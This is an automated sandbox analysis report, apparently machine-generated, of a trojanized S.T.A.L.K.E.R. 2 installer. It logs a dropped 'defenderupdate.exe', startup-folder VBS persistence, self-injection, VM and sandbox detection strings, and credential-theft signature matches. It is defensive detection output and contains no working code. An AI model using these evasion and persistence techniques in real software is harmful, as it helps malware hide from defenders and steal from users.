                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0045B9DD push esi; ret 9_2_0045B9E6
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00455EAF push ecx; ret 9_2_00455EC2
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00433FF6 push ecx; ret 9_2_00434009
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00406128 ShellExecuteW,URLDownloadToFileW,9_2_00406128
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Roaming\defenderupdate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpFile created: C:\Users\user\AppData\Local\Temp\is-MG2J6.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeFile created: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpFile created: C:\Users\user\AppData\Local\Temp\Setup Log 2024-11-24 #001.txtJump to behavior

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbsJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00419BC4
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041BCE3
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0040E54F Sleep,ExitProcess,9_2_0040E54F
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1859614323.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: 4B90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: 68C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: 6480000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: 7B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: 8B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_004198C2
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MG2J6.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeAPI coverage: 4.8 %
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exe TID: 7632Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exe TID: 7632Thread sleep time: -114000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040B335
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,9_2_0041B42F
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040B53A
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,9_2_004089A9
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00406AC2 FindFirstFileW,FindNextFileW,9_2_00406AC2
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,9_2_00407A8C
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00418C69
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,9_2_00408DA7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00406F06
                  Source: defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, eBHn6qHPLz.exe, 00000004.00000002.3540084387.0000000001243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: defenderupdate.exe, 00000008.00000002.2168900167.00000000032F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: eBHn6qHPLz.exe, 00000004.00000002.3540084387.0000000001243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVC
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043A65D
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041BCE3
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00442554 mov eax, dword ptr fs:[00000030h]9_2_00442554
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0044E92E GetProcessHeap,9_2_0044E92E
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00434168
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043A65D
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00433B44
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00433CD7 SetUnhandledExceptionFilter,9_2_00433CD7
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMemory written: C:\Users\user\Desktop\eBHn6qHPLz.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeMemory written: C:\Users\user\AppData\Roaming\defenderupdate.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00410F36
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00418754 mouse_event,9_2_00418754
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess created: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe "C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe" Jump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess created: C:\Users\user\Desktop\eBHn6qHPLz.exe "C:\Users\user\Desktop\eBHn6qHPLz.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\defenderupdate.exe "C:\Users\user\AppData\Roaming\defenderupdate.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess created: C:\Users\user\AppData\Roaming\defenderupdate.exe "C:\Users\user\AppData\Roaming\defenderupdate.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00433E0A cpuid 9_2_00433E0A
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: EnumSystemLocalesW,9_2_004470AE
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetLocaleInfoW,9_2_004510BA
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004511E3
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetLocaleInfoW,9_2_004512EA
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_004513B7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetLocaleInfoW,9_2_00447597
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetLocaleInfoA,9_2_0040E679
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_00450A7F
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: EnumSystemLocalesW,9_2_00450CF7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: EnumSystemLocalesW,9_2_00450D42
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: EnumSystemLocalesW,9_2_00450DDD
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00450E6A
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeQueries volume information: C:\Users\user\Desktop\eBHn6qHPLz.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeQueries volume information: C:\Users\user\AppData\Roaming\defenderupdate.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00434010
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041A7A2 GetUserNameW,9_2_0041A7A2
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,9_2_00448057
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3538658538.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2166640000.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
